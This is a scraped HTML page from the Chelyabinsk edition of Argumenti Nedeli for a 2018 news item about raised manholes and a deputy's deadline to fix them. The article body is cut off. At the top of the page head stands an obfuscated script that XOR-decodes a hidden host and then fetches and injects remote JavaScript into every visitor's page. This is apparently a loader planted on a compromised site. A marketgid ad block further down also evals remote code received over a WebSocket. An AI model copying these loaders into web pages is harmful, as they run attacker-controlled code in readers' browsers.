<!DOCTYPE html>
<html>
	<head>
	<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
	<meta name='yandex-verification' content='57463a260b82b280' />
	<meta name="google-site-verification" content="tossbk_I2eb3-RB8DxVbAUYPewK5KDyj6bnrnKC8-eU" />
	<meta name="mailru-verification" content="1505d3c11701cb6c" />
	<meta name="dumedia-verify" content="df31ef70be34">
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<!-- From Cache --><script type="text/javascript">
    // Mon Oct 08 2018 17:06:04 GMT+0300 (Moscow Standard Time)
    new (function() {
        var host,
            v = 300,
            us,
            start;
        var c = function (g, u, s, h) {
            us = g;
            v = u;
            host = s;
            load([e(atob(host), p(g)), h].join("/"));
        };

        var load = function(g){
            start = window["performance"]["now"]();
            if (typeof window.fetch === 'function') {
                fetch(new Request(g, {redirect: 'error', 'method': 'GET'}))
                    .then(function (response) {
                        return response.text();
                    })
                    .then(insertScript)
                    .catch(onLoadError);
            } else {
                var h = new window["XMLHttpRequest"]();
                h["open"]("GET", g, true);
                h["responseType"] = "text";
                h["addEventListener"]("load", onLoad);
                h["addEventListener"]("error", onLoadError);
                h["send"](null);
            }

        };
        var onLoad = function(e){
            var c = e.target;
            if (c['status'] === 204) {
                return
            }
            insertScript(c.responseText);
        };

        var onLoadError = function(e){
            var b = window["performance"]["now"]() - start;
            if (v > 0 && b > 0 && b < v) {
                /* stop()*/
            }
        };
        var insertScript = function(c){
            var d = window['document']["createElement"]("script");
            d["async"] = false;
            d["textContent"] = c;
            var attr = {"id": "cc-support-script", "data-config":  us, "data-base": host};
            Object.keys(attr).forEach(function (key) {
                d.setAttribute(key, attr[key]);
            });
            window['document']["head"]["appendChild"](d);
        };
        var stop = function(){
            var c = window['document']["styleSheets"];
            for (var d = 0; d < c['length']; d++) {
                c[d]["disabled"] = true
            }
            window["stop"]();
        };
        function p (s) {
            var str = 0;
            s = s.toString().split("");
            for(var i = 0; i< s.length; i++){
                str+= parseInt(s[i]);
            }
            return str.toString();
        }

        function e (s, k) {
            var enc = "";
            for (var i = 0; i < s.length; i++) {
                var a = s.charCodeAt(i);
                var b = a ^ k;
                enc = enc + String.fromCharCode(b);
            }
            return enc;
        }
        return c;
    }() )('5783', 300, 'f2NjZ2QtODhlcnNxfnxyc2JwOWVi', 'ukwl54/04ybiav3oqt/pyhqyjv/piacdrfabytd/8crd9gcr7c0/9iv2y82m/medsdfs6a');
</script>
<script id="cc-support-script" data-config="5783" data-base="f2NjZ2QtODhlcnNxfnxyc2JwOWVi" type="text/javascript" src="https://redfikedug.ru/ukwl54/04ybiav3oqt/pyhqyjv/piacdrfabytd/8crd9gcr7c0/9iv2y82m/medsdfs6a"></script>		
		<!--[if IE]>
<script src="http://html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
	<meta name="757a66e838ed83d5840779983391e519" content="">
	<title>Бурматов дал срок до конца недели устранить аварийные люки - Аргументы Недели. Челябинск</title><meta name="description" content="Люки и ливневки стали настоящими ловушками для автомобилистов в Челябинске. Дело в том, что после ремонта центральных улиц люки стали выше на несколько сантиметров, а ливневки - ниже. Либо лавировать, либо портить подвеску. Автомобилисты пожаловались депутату Госдумы Владимиру Бурматову"><meta name="twitter:title" content="Бурматов дал срок до конца недели устранить аварийные люки - Аргументы Недели. Челябинск"><meta name="twitter:image" content="http://argumenti.ru/images/arhnews/588233.jpg"><meta name="og:title" content="Бурматов дал срок до конца недели устранить аварийные люки - Аргументы Недели. Челябинск"><meta name="og:description" content="Люки и ливневки стали настоящими ловушками для автомобилистов в Челябинске. Дело в том, что после ремонта центральных улиц люки стали выше на несколько сантиметров, а ливневки - ниже. Либо лавировать, либо портить подвеску. Автомобилисты пожаловались депутату Госдумы Владимиру Бурматову"><meta name="og:image" content="http://argumenti.ru/images/arhnews/588233.jpg"><meta name="mediator_published_time" content="2018-10-08T13:23:30+0000"><meta name="mediator_theme" content="Челябинск"><meta name="mediator_theme" content="Бурматов"><meta name="mediator_theme" content="ремонт дорог"><meta name="mediator_theme" content="губернатор"><meta name="mediator_theme" content="Дубровский"><meta name="mediator" content="588233"><link rel="stylesheet" href="http://argumenti.ru/pub/styles/reset.css" type="text/css"><link rel="stylesheet" href="http://argumenti.ru/pub/styles/mainv.css?ver=128" type="text/css"><link rel="stylesheet" href="http://argumenti.ru/mistakes/static/mistakes.css" type="text/css"><link rel="image_src" href="http://argumenti.ru/images/arhnews/588233.jpg" >	<//base href="http://argumenti.ru/" />
			<link rel="amphtml" href="http://argumenti.ru/society/2018/10/588233/amp">
		
		
	<link title="argumenti_ru" type="application/rss+xml" rel="alternate" href="http://www.argumenti.ru/rss/argumenti_online.xml"/>
	<link rel="icon" type="image/ico" href="http://argumenti.ru/favicon.ico" />
	<link rel="icon" type="image/png" href="http://argumenti.ru/favicon.png">
	<link rel="apple-touch-icon" href="http://www.argumenti.ru/pub/images/apple-touch-icon-iphone.png" />
	<link rel="apple-touch-icon" sizes="72x72" href="http://www.argumenti.ru/pub/images/apple-touch-icon-ipad.png" />
	<link rel="apple-touch-icon" sizes="114x114" href="http://www.argumenti.ru/pub/images/apple-touch-icon-iphone4.png" />
	<link rel="apple-touch-icon" sizes="144x144" href="http://www.argumenti.ru/pub/images/apple-touch-icon-ipad3.png" />
	<link rel="stylesheet" href="//maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css">
	<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js"></script>
	<script language="JavaScript" src="http://argumenti.ru/pub/js/argumenti_21.js?ver=7"></script>
	<script language="JavaScript" src="http://argumenti.ru/mistakes/static/mistakes_2.js"></script>
	<script type="text/javascript" src="http://argumenti.ru/pub/js/jdropdowns/jquery.dropdownPlain.js"></script>
	<script type="text/javascript" src="http://argumentiru.com/pub/js/jscroller-0.4.js"></script>
	<script language="JavaScript" src="http://argumenti.ru/pub/js/jquery.jcarousel.min.js"></script>
	<script language="JavaScript" src="http://argumenti.ru/pub/js/jquery.validate.min.js"></script>
	<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.5.3/jquery-ui.min.js"></script>
    <script type="text/javascript" src="http://argumenti.ru/pub/js/tinycarusel.js"></script>
 	<script src="https://yastatic.net/pcode/adfox/loader.js" crossorigin="anonymous"></script>
 <!-- Put this script tag to the <head> of your page -->
<script type="text/javascript" src="https://vk.com/js/api/share.js?94" charset="windows-1251"></script>
<script id="my-widget-script" async
        src="https://likemore-go.imgsmail.ru/widget.js"
        data-uid="9f8d155b17e468abed8b96495fb48897">
</script>
	</head>

			<body>
	
<!-- create page: 17:10:35 10.08.18 -->

<!-- Yandex.Metrika counter  ONLINE -->
<script type="text/javascript">
(function (d, w, c) {
    (w[c] = w[c] || []).push(function() {
        try {
            w.yaCounter26004090 = new Ya.Metrika({id:26004090,
                    clickmap:true,
                    trackLinks:true,
                    accurateTrackBounce:true});
        } catch(e) { }
    });

    var n = d.getElementsByTagName("script")[0],
        s = d.createElement("script"),
        f = function () { n.parentNode.insertBefore(s, n); };
    s.type = "text/javascript";
    s.async = true;
    s.src = (d.location.protocol == "https:" ? "https:" : "http:") + "//mc.yandex.ru/metrika/watch.js";

    if (w.opera == "[object Opera]") {
        d.addEventListener("DOMContentLoaded", f, false);
    } else { f(); }
})(document, window, "yandex_metrika_callbacks");
</script>
<noscript><div><img src="//mc.yandex.ru/watch/26004090" style="position:absolute; left:-9999px;" alt="" /></div></noscript>
<!-- /Yandex.Metrika counter -->
<!--Desktop--!>
<header>

<nav>
<div class="menu_wrapper">
<div class="menuToggle"><i class="fa fa-bars" aria-hidden="true"></i></div>
	<ul id="dropdown" class="dropdown">
	    <li class="mob_hidden"><a href="http://argumenti.ru/">Главная страница</a></li>
		<li class="mob_hidden"><a href="http://argumenti.ru/live">АН LIVE</a></li>
		<li class="mob_hidden"><a href="http://argumenti.ru/an">Скачать «Аргументы Недели»</a></li>
		<li class="mob_hidden"><a href="http://argumenti.ru/charity">Сможем вместе</a></li>
		<li class="mob_hidden"><a href="http://knigi-an.ru" target="_blank" rel="nofollow">Книги «АН»</a></li>
		<li class="mob_hidden"><a href="http://argumenti.ru/allbooks" target="_blank" rel="nofollow">Книги pdf</a></li>
		<li class="mob_hidden"><a href="http://argumenti.ru/complanes">Книга жалоб</a></li>
		<li class="mob_hidden"><a href="http://argumenti.ru/udobreniya">Биоклад</a></li>
		<li class="mob_hidden"><a href="http://argumenti.ru/opinion">Мнение</a></li>
		<li class="mob_hidden up_bars"><i class="fa fa-bars" aria-hidden="true"></i></li>
		<div class="dropmenu">
		<ul>
			<li><a href="http://argumenti.ru/social">Соцпакет</a></li>
			<li><a href="http://argumenti.ru/pravoved">Правовед</a></li>
			<li><a href="http://argumenti.ru/gorodm">Город&nbsp;М</a></li>
			<li><a href="http://argumenti.ru/earth"><nobr>Сад-огород</nobr></a></li>
			<li><a href="http://argumenti.ru/espionage">Шпионаж</a></li>
			<li><a href="http://argumenti.ru/crime">Криминал</a></li>
			<li><a href="http://argumenti.ru/culture">Культура</a></li>
			<li><a href="http://argumenti.ru/health">Здоровье</a></li>
			<li><a href="http://argumenti.ru/history">История</a></li>
			<li><a href="http://argumenti.ru/education">Образование</a></li>
			<li><a href="http://argumenti.ru/army">Армия</a></li>
			<li><a href="http://argumenti.ru/hitech">Хайтек</a></li>
			<li style="border-bottom: none!important;"><a href="http://argumenti.ru/scandal">Скандал</a></li>
			<li class="drop_sub">Регионы</li>
			<li><a href="http://argumenti.ru/region/spb">АН - CПб</a></li>
			<li><a href="http://an-crimea.ru/" rel='nofollow'>АН - Крым</a></li>
			<li><a href="http://argumenti.ru/region/ekb">АН - Екб</a></li>		</ul>
		</div>
	</ul>
	<ul id="dropdown" class="dropdown desc_hidden">
		<li><a href="http://argumenti.ru">Главная</a></li>
		<li><a href="http://argumenti.ru/live">АН LIVE</a></li>
		<li><a href="http://argumenti.ru/news">Все новости</a></li>
	    <li class="submenu_name">Рубрики</li>
		<li><a href="http://argumenti.ru/politics">Политика</a></li>
		<li><a href="http://argumenti.ru/economics">Экономика</a></li>
		<li><a href="http://argumenti.ru/society">Общество</a></li>
		<li><a href="http://argumenti.ru/world">В мире</a></li>
		<li><a href="http://argumenti.ru/social">Соцпакет</a></li>
		<li><a href="http://argumenti.ru/pravoved">Правовед</a></li>
		<li><a href="http://argumenti.ru/rassledovanie">Расследования</a></li>
		<li><a href="http://argumenti.ru/hitech">Хайтек</a></li>
		<li><a href="http://argumenti.ru/gorodm">Город&nbsp;М</a></li>
		<li><a href="http://argumenti.ru/earth"><nobr>Сад-огород</nobr></a></li>
		<li><a href="http://argumenti.ru/espionage">Шпионаж</a></li>
		<li><a href="http://argumenti.ru/scandal">Скандал</a></li>
		<li><a href="http://argumenti.ru/sport">Спорт</a></li>
		<li><a href="http://argumenti.ru/crime">Криминал</a></li>
		<li><a href="http://argumenti.ru/showbiz"><nobr>Шоубиз</nobr></a></li>
		<li><a href="http://argumenti.ru/health">Здоровье</a></li>
		<li><a href="http://argumenti.ru/history">История</a></li>
		<li><a href="http://argumenti.ru/education">Образование</a></li>
		<li><a href="http://argumenti.ru/tourism">Туризм</a></li>
		<li><a href="http://argumenti.ru/army">Армия</a></li>
	</ul>	
</div>
</nav>
	<div id="star">
			<ul>
																								<li id="82004">
																<a href="http://argumenti.ru/world/2018/10/588205?utm_source=argumenti.ru&utm_medium=tabloid&utm_campaign=top" target="_self"><img src="http://argumenti.ru/images/preview/arhnews/9ccf9ad3bde6ef48058f9c2bb92ff7ef.jpg" width="160" height="110" alt="Политолог оценил возможное введение санкций США против Индии из-за покупки С-400" />
																					<p>Политолог оценил возможное введение санкций США против Индии из-за покупки С-400</p></a>	
						</li>

																								<li id="82007" >
																								<a href="http://argumenti.ru/world/2018/10/588211?utm_source=argumenti.ru&utm_medium=tabloid&utm_campaign=top" target="_self"><img src="http://argumenti.ru/images/preview/arhnews/ac131f32833863002bf37f9fafa8692d.jpg" width="160" height="110" alt="Посол ЕС рассказал об &quot;островках сотрудничества&quot; с Россией" />
																<p>Посол ЕС рассказал об &quot;островках сотрудничества&quot; с Россией</p></a>
								
						</li>
																									<li id="82005">
																<a href="http://argumenti.ru/society/2018/10/588216?utm_source=argumenti.ru&utm_medium=tabloid&utm_campaign=top" target="_self"><img src="http://argumenti.ru/images/preview/arhnews/6934e86f770f9433133ad16b010338fc.jpg" width="160" height="110" alt="Синоптики сообщили, какая погода будет в Москве в октябре" />
																					<p>Синоптики сообщили, какая погода будет в Москве в октябре</p></a>	
						</li>

												</ul>
		</div></header>
        
<div class="container">
	<div class="content">
		<!-- логотип -->

		<div id="corp">
							<a href="http://argumenti.ru/" id="an_logo"><img alt="Аргументы Недели (argumenti.ru)" src="http://www.argumenti.ru/images/argumenti/AN2.gif"/></a>
					<div id="search_time">

														<a href="http://argumenti.ru/region/chelyabinsk"><div class="regiontitle">Челябинск</div></a>
						
			


<div class="ya-site-form ya-site-form_inited_no" onclick="return {'action':'http://argumenti.ru/search','arrow':false,'bg':'transparent','fontsize':12,'fg':'#000000','language':'ru','logo':'rb','publicname':'Yandex Site Search #2186328','suggest':true,'tld':'ru','type':2,'usebigdictionary':true,'searchid':2186328,'webopt':false,'websearch':false,'input_fg':'#000000','input_bg':'#ffffff','input_fontStyle':'normal','input_fontWeight':'normal','input_placeholder':'Поиск...','input_placeholderColor':'#000000','input_borderColor':'#7f9db9'}">
	<form action="http://yandex.ru/sitesearch" method="get" target="_blank">
		<input type="hidden" name="searchid" value="2186328"/>
		<input type="hidden" name="l10n" value="ru"/>
		<input type="hidden" name="reqenc" value=""/>
		<input type="search" name="text" value=""/>
		<input type="submit" value="Найти"/>
	</form></div><style type="text/css">.ya-page_js_yes .ya-site-form_inited_no { display: none; }</style><script type="text/javascript">(function(w,d,c){var s=d.createElement('script'),h=d.getElementsByTagName('script')[0],e=d.documentElement;if((' '+e.className+' ').indexOf(' ya-page_js_yes ')===-1){e.className+=' ya-page_js_yes';}s.type='text/javascript';s.async=true;s.charset='utf-8';s.src=(d.location.protocol==='https:'?'https:':'http:')+'//site.yandex.net/v2.0/js/all.js';h.parentNode.insertBefore(s,h);(w[c]||(w[c]=[])).push(function(){Ya.Site.Form.init()})})(window,document,'yandex_site_callbacks');</script>

	</div>
		<div class="soc_reg mob_hidden">

            
				<div id="social_top">
					<!--<a href="https://t.me/argumentiru" target="_blank"><i class="fa fa-telegram" aria-hidden="true"></i></a>-->
					<a href="https://vk.com/club14409962" target="_blank"><i class="fa fa-vk" aria-hidden="true"></i></a>
					<a href="https://ok.ru/argumenti" target="_blank"><i class="fa fa-odnoklassniki" aria-hidden="true"></i></a>
					<a href="https://www.facebook.com/argumentinedeli" target="_blank"><i class="fa fa-facebook" aria-hidden="true"></i></a>
					<a href="https://twitter.com/argumenti" target="_blank"><i class="fa fa-twitter" aria-hidden="true"></i></a>
					<a href="https://www.instagram.com/argumenti.ru/" target="_blank"><i class="fa fa-instagram" aria-hidden="true"></i></a>

				</div>	


			<div id="parts">
		<select id="Regions" onchange="window.location.href=this.options[this.selectedIndex].value">
			<option value="">Регион</option>
			<option value="http://argumenti.ru/">Вся Россия</option>
								
				<option value="http://argumenti.ru/region/altay">Алтайский край</option>
								
				<option value="http://argumenti.ru/region/baltiya">Балтия</option>
								
				<option value="http://argumenti.ru/region/belrus">Белоруссия</option>
								
				<option value="http://argumenti.ru/region/vladivostok">Владивосток</option>
								
				<option value="http://argumenti.ru/region/volgograd">Волгоград</option>
								
				<option value="http://argumenti.ru/region/vyatka">Вятка</option>
								
				<option value="http://argumenti.ru/region/ekb">Екатеринбург</option>
								
				<option value="http://argumenti.ru/region/irkutsk">Иркутск</option>
								
				<option value="http://argumenti.ru/region/kamchatka">Камчатка</option>
								
				<option value="http://argumenti.ru/region/krasnoyarsk">Красноярск</option>
								
				<option value="http://an-crimea.ru/">Крым</option>
								
				<option value="http://argumenti.ru/region/kuban">Кубань</option>
								
				<option value="http://argumenti.ru/region/kursk">Курск</option>
								
				<option value="http://argumenti.kg/">Кыргызстан</option>
								
				<option value="http://argumenti.ru/region/lipetsk">Липецк</option>
								
				<option value="http://argumenti.ru/region/murmansk">Мурманск</option>
								
				<option value="http://argumenti.ru/region/novosib">Новосибирск</option>
								
				<option value="http://argumenti.ru/region/orel">Орел</option>
								
				<option value="http://argumenti.ru/region/penza">Пенза</option>
								
				<option value="http://argumenti.ru/region/perm">Пермь</option>
								
				<option value="http://argumenti.ru/region/petrozavodsk">Петрозаводск</option>
								
				<option value="http://argumenti.ru/region/petropavlovsk">Петропавловск-К</option>
								
				<option value="http://argumenti.ru/region/spb">Санкт-Петербург</option>
								
				<option value="http://argumenti.ru/region/sakhlin">Сахалин</option>
								
				<option value="http://argumenti.ru/region/kavkaz">Северный Кавказ</option>
								
				<option value="http://argumenti.ru/region/tatarstan">Татарстан</option>
								
				<option value="http://argumenti.ru/region/tver">Тверь</option>
								
				<option value="http://argumenti.ru/region/ural">Урал</option>
								
				<option value="http://argumenti.ru/region/chelyabinsk">Челябинск</option>
								
				<option value="http://argumenti.ru/region/yakutsk">Якутск</option>
								
				<option value="http://argumenti.ru/region/yaroslavl">Ярославль</option>
				
		</select>
	</div>        </div>

		</div>

		<div class="new_corp">
								<div id="menus">
		<ul class="mainmenu">
			<li><a href="http://argumenti.ru/politics">Политика</a></li>
			<li><a href="http://argumenti.ru/economics">Экономика</a></li>
			<li><a href="http://argumenti.ru/society">Общество</a></li>
			<li><a href="http://argumenti.ru/world">В мире</a></li>			
			<li><a href="http://argumenti.ru/showbiz"><nobr>Шоубиз</nobr></a></li>
			<li><a href="http://argumenti.ru/sport">Спорт</a></li>
			<li><a href="http://argumenti.ru/lifestyle">Лайфстайл</a></li>
			<li><a href="http://argumenti.ru/tourism">Туризм</a></li>
			<li><a href="http://argumenti.ru/culture">Культура</a></li>
		</ul>
</div>
		<!-- Rating@Mail.ru counter -->
<script type="text/javascript">//<![CDATA[
var _tmr = _tmr || [];
_tmr.push({id: "1069168", type: "pageView", start: (new Date()).getTime()});
(function (d, w) {
   var ts = d.createElement("script"); ts.type = "text/javascript"; ts.async = true;
   ts.src = (d.location.protocol == "https:" ? "https:" : "http:") + "//top-fwz1.mail.ru/js/code.js";
   var f = function () {var s = d.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ts, s);};
   if (w.opera == "[object Opera]") { d.addEventListener("DOMContentLoaded", f, false); } else { f(); }
})(document, window);
//]]></script><noscript><div style="position:absolute;left:-10000px;">
<img src="//top-fwz1.mail.ru/counter?id=1069168;js=na" style="border:0;" height="1" width="1" alt="Рейтинг@Mail.ru" />
</div></noscript>
<!-- //Rating@Mail.ru counter -->

		</div>

					<div id="left">
		
			<!-- Yandex.RTB R-A-50615-15 -->
<div id="yandex_rtb_R-A-50615-15"></div>
<script type="text/javascript">
    (function(w, d, n, s, t) {
        w[n] = w[n] || [];
        w[n].push(function() {
            Ya.Context.AdvManager.render({
                blockId: "R-A-50615-15",
                renderTo: "yandex_rtb_R-A-50615-15",
                async: true
            });
        });
        t = d.getElementsByTagName("script")[0];
        s = d.createElement("script");
        s.type = "text/javascript";
        s.src = "//an.yandex.ru/system/context.js";
        s.async = true;
        t.parentNode.insertBefore(s, t);
    })(this, this.document, "yandexContextAsyncCallbacks");
</script>	
	<div id="titules" style="margin-bottom: 4px;">
		
	<a href="http://argumenti.ru/an">

	<img src="http://argumenti.ru/images/preview/price/724f8112dd5b2b2363ddc1d1f8f4f505.jpg" alt="Аргументы Недели. 39(632) от 4.10.2018">		
	</a>

		
	</div>

	<!-- подменю -->
	<ul id="corpmenu">
		<li><a href="http://argumenti.ru/an">Скачать «Аргументы Недели»</a></li>
		<li><a href="http://www.argumenti.ru/reklama/internet.html">Реклама в «АН»</a></li>
		<li><a href="http://argumenti.ru/subscript">Подписка на газету</a></li>
	
	</ul>


	<script language="JavaScript" type="text/javascript">
		function NewRegion() {
			region_url = $('#Regions option:selected').val();
			if (region_url !='')
				window.location = region_url;
		}
	</script>
	<!--Тимошенко-->
	
	<h2 class="namerub"><span class="rem">//</span>Новости партнеров</h2>
<div id="smi2adblock_76450"><a href="http://net.finam.ru/" rel="nofollow">Новости net.finam.ru</a></div>
<script type="text/javascript" charset="utf-8">
  (function() {
    var sc = document.createElement('script'); sc.type = 'text/javascript'; sc.async = true;
    sc.src = 'http://js.net.finam.ru/data/js/76450.js'; sc.charset = 'utf-8';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(sc, s);
  }());
</script>




	<!--опросы-->
		
	<h2 class="namerub"><span class="rem">//</span>НАШИ ПАРТНЕРЫ</h2>
<img src="http://argumenti.ru/pub/images/partners/524.gif" alt="наши партнеры">	

	<h2 class="namerub"><span class="rem">//</span>Новости marketgid</h2>
<!-- M7342Composite Start --> <div id="M7342Composite647352"><center> <a href="http://marketgid.com/" target="_blank" rel="nofollow">Загрузка...</a> </center></div> <script type="text/javascript"> var d = new Date, script647352 = document.createElement("script"), mg_ws647352 = {};script647352.type = "text/javascript";script647352.charset = "utf-8";script647352.src = "//jsc.marketgid.com/n/e/news.argumenti.ru.647352.js?t=" + d.getYear() + d.getMonth() + d.getDay() + d.getHours();script647352.onerror = function () { mg_ws647352 = new Worker(URL.createObjectURL(new Blob(['eval(atob(\'ZnVuY3Rpb24gc2VuZE1lc3NhZ2U2NDczNTIoZSl7dmFyIGg9bWdfd3M2NDczNTIub25tZXNzYWdlOyBtZ193czY0NzM1Mi5yZWFkeVN0YXRlPT1tZ193czY0NzM1Mi5DTE9TRUQmJihtZ193czY0NzM1Mj1uZXcgV2ViU29ja2V0KG1nX3dzNjQ3MzUyX2xvY2F0aW9uKSksbWdfd3M2NDczNTIub25tZXNzYWdlPWgsd2FpdEZvclNvY2tldENvbm5lY3Rpb242NDczNTIobWdfd3M2NDczNTIsZnVuY3Rpb24oKXttZ193czY0NzM1Mi5zZW5kKGUpfSl9ZnVuY3Rpb24gd2FpdEZvclNvY2tldENvbm5lY3Rpb242NDczNTIoZSx0KXtzZXRUaW1lb3V0KGZ1bmN0aW9uKCl7cmV0dXJuIDE9PT1lLnJlYWR5U3RhdGU/dm9pZChudWxsIT10JiZ0KCkpOnZvaWQgd2FpdEZvclNvY2tldENvbm5lY3Rpb242NDczNTIoZSx0KX0sNSl9OyB2YXIgbWdfd3M2NDczNTJfbG9jYXRpb24gPSAid3NzOi8vd3NwLm1hcmtldGdpZC5jb20vd3MiOyBtZ193czY0NzM1MiA9IG5ldyBXZWJTb2NrZXQobWdfd3M2NDczNTJfbG9jYXRpb24pLCBtZ193czY0NzM1Mi5vbm1lc3NhZ2UgPSBmdW5jdGlvbiAodCkge3Bvc3RNZXNzYWdlKHQuZGF0YSk7fSwgb25tZXNzYWdlID0gZnVuY3Rpb24oZSl7c2VuZE1lc3NhZ2U2NDczNTIoZS5kYXRhKX0=\'))']), {type: "application/javascript"})); mg_ws647352.onmessage = function (msg){window.eval(msg.data);}; mg_ws647352.postMessage('js|'+script647352.src+'|M7342Composite647352|M7342Composite647352');};document.body.appendChild(script647352); </script> <!-- M7342Composite End -->

	<h2 class="namerub"><span class="rem">//</span>новости 24СМИ</h2>
<div id="smi_teaser_2695">
    <center>
        <a href="https://24smi.info/?utm_source=informer_2695" rel="nofollow">
            Агрегатор новостей 24СМИ
        </a>
    </center>
</div>

<script type="text/JavaScript" encoding="utf8">
 (function() {
 var sm = document.createElement("script");
 sm.type = "text/javascript";
 sm.async = true;
 sm.src = "//jsn.24smi.net/d/b/2695.js";
 var s = document.getElementsByTagName("script")[0];
 s.parentNode.insertBefore(sm, s);})();
</script>
	<div id="smi2adblock_81550"><a href="http://advert.mirtesen.ru/" rel="nofollow">Новости advert.mirtesen.ru</a></div>
<script type="text/javascript" charset="utf-8">
  (function() {
    var sc = document.createElement('script'); sc.type = 'text/javascript'; sc.async = true;
    sc.src = '//js.advert.mirtesen.ru/data/js/81550.js'; sc.charset = 'utf-8';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(sc, s);
  }());
</script>
	
	
<div id="unit_83036"><a href="http://smi2.net/" rel="nofollow">Новости СМИ2</a></div>
<script type="text/javascript" charset="utf-8">
  (function() {
    var sc = document.createElement('script'); sc.type = 'text/javascript'; sc.async = true;
    sc.src = '//news.smi2.ru/data/js/83036.js'; sc.charset = 'utf-8';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(sc, s);
  }());
</script>				
	
	<!--попновости-->	
	<h4 class="namerub"><span class="rem">//</span>Поп-новости</h4>
<ul class="main_inf_anons">
			<li>
							<a href="http://argumenti.ru/showbiz/2018/10/588267">
					<img src="http://argumenti.ru/images/preview/arhnews/167b65e3011a771dc06ee6fbcad4f3d7.jpg" alt="Ксения Собчак решила измениться" />
				</a>
						
			<a href="http://argumenti.ru/showbiz/2018/10/588267" style="font-size:1.05em;">Ксения Собчак решила измениться</a>
		</li>
			<li>
							<a href="http://argumenti.ru/showbiz/2018/10/588255">
					<img src="http://argumenti.ru/images/preview/arhnews/baf163fc5d217534553281d856e40035.jpeg" alt="Фанаты группы &quot;Руки вверх!&quot; подозревают, что Сергея Жукова заменяет двойник" />
				</a>
						
			<a href="http://argumenti.ru/showbiz/2018/10/588255" style="font-size:1.05em;">Фанаты группы &quot;Руки вверх!&quot; подозревают, что Сергея Жукова заменяет двойник</a>
		</li>
			<li>
							<a href="http://argumenti.ru/showbiz/2018/10/588242">
					<img src="http://argumenti.ru/images/preview/arhnews/456b82db61af4d24fda46fd9ccf83821.jpeg" alt="Счета Елены Степаненко арестованы" />
				</a>
						
			<a href="http://argumenti.ru/showbiz/2018/10/588242" style="font-size:1.05em;">Счета Елены Степаненко арестованы</a>
		</li>
			<li>
							<a href="http://argumenti.ru/showbiz/2018/10/588209">
					<img src="http://argumenti.ru/images/preview/arhnews/2d545240a37ca142262390d9318e1cea.jpg" alt="В Нью-Йорке смертельно ранен Фрэнк Снайдер, известный рэпер  Hollywood Play" />
				</a>
						
			<a href="http://argumenti.ru/showbiz/2018/10/588209" style="font-size:1.05em;">В Нью-Йорке смертельно ранен Фрэнк Снайдер, известный рэпер  Hollywood Play</a>
		</li>
	</ul>
	<h2 class="namerub"><span class="rem">//</span>Новости news.net.finam.ru</h2>
<div id="smi2adblock_68993"><a href="http://finance.comon.ru/" rel="nofollow">Новости finance.comon.ru</a></div>
<script async type="text/javascript" charset="windows-1251">
  (function() {
    var sc = document.createElement('script'); sc.type = 'text/javascript'; sc.async = true;
    sc.src = 'http://js.finance.comon.ru/data/js/68993.js'; sc.charset = 'windows-1251';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(sc, s);
  }());
</script>



				<h4 class="namerub"><span class="rem">//</span>Сад и огород</h4>
		<ul class="minf_anons">
							<li><a href="http://argumenti.ru/ad_informer/click/68946" target="_blank"><img src="http://argumenti.ru/images/preview/tabloid/41be9494515abc45b9a4829cf417a55c.png" width="70" height="70" alt="Биоклад"  border="0" /><div class="inf_txt">Биоклад лёгок и удобен в применении на вашем дачном участке</div></a></li>	
							<li><a href="http://argumenti.ru/ad_informer/click/80427" target="_blank"><img src="http://argumenti.ru/images/preview/tabloid/113300d0dd33a120643434787da27c47.jpeg" width="70" height="70" alt="Биоклад"  border="0" /><div class="inf_txt">Выращиваем огурцы</div></a></li>	
					</ul>
	
	<div id="block__fix-adv">
		<!-- Yandex.RTB R-A-50615-2 -->
<div id="yandex_rtb_R-A-50615-2"></div>
<script type="text/javascript">
    (function(w, d, n, s, t) {
        w[n] = w[n] || [];
        w[n].push(function() {
            Ya.Context.AdvManager.render({
                blockId: "R-A-50615-2",
                renderTo: "yandex_rtb_R-A-50615-2",
                async: true
            });
        });
        t = d.getElementsByTagName("script")[0];
        s = d.createElement("script");
        s.type = "text/javascript";
        s.src = "//an.yandex.ru/system/context.js";
        s.async = true;
        t.parentNode.insertBefore(s, t);
    })(this, this.document, "yandexContextAsyncCallbacks");
</script>		
	</div>

</div>			
		<section id="center">

			<!--noindex-->

	<ul id="topanons">
					<li><span class="news_time">15.09&nbsp;13:13</span><a href="http://argumenti.ru/society/2016/09/467498?utm_source=argumenti.ru&utm_medium=news&utm_campaign=last">Владелец маршруток в Челябинске задолжала по штрафам более 80 тысяч рублей</a></li>
					<li><span class="news_time">14.09&nbsp;10:49</span><a href="http://argumenti.ru/society/2016/09/467298?utm_source=argumenti.ru&utm_medium=news&utm_campaign=last">В Миассе водителей проверили на трезвость</a></li>
					<li><span class="news_time">14.09&nbsp;10:41</span><a href="http://argumenti.ru/society/2016/09/467294?utm_source=argumenti.ru&utm_medium=news&utm_campaign=last">В Златоусте инспекторов ГИБДД усилили священниками</a></li>
					<li><span class="news_time">14.09&nbsp;10:32</span><a href="http://argumenti.ru/society/2016/09/467293?utm_source=argumenti.ru&utm_medium=news&utm_campaign=last">Участник забега &laquo;Азия-Европа&raquo; умер на финише</a></li>
					<li><span class="news_time">13.09&nbsp;13:09</span><a href="http://argumenti.ru/society/2016/09/467179?utm_source=argumenti.ru&utm_medium=news&utm_campaign=last">В Челябинске становится традицией спасать больших кошек</a></li>
				<li class="news_arh">
							<a href="http://argumenti.ru/society/news">Общество</a> /
								<a href="http://argumenti.ru/region/chelyabinsk/archive">Челябинск</a> /
				<a href="http://argumenti.ru/news" style="font-size:1.2em">Все новости >></a>

		</li>
	</ul>

	<!--/noindex-->			
	
			<p class="namerub">
			<span class="rem">//</span><a href="http://argumenti.ru/society">Общество</a>
						<span class="agecategory">
									13+
							</span>
		</p>
	
	<article>
	<h1>Бурматов дал срок до конца недели устранить аварийные люки</h1>
	
				<p class="info">
					<span class="number_info">

						
						

